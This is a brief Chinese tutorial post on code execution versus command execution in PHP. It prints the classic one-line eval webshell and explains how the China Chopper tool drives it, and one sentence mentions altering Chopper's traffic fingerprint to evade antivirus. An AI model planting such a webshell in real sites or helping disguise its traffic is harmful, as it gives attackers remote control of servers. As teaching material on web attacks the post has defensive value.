0x01:代码执行和命令执行的区别?
- 命令执行是指系统cmd或者shell命令的执行,代码执行是指php代码执行函数eval、assert等
0x02:经典实例–>菜刀、一句话
- php一句话:
<?php eval($_POST['pass']);?>
// 等价于
<?php
$code = $_POST['pass'];
eval($code);
?>
- 菜刀的原理也就是给参数abc赋不同的值来执行命令,也就是得到webshell。
- 可以通过抓包来分析菜刀传递的命令,如果自己想搞免杀,则需要修改菜刀的指纹,即修改发送的命令包。
欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。
网友评论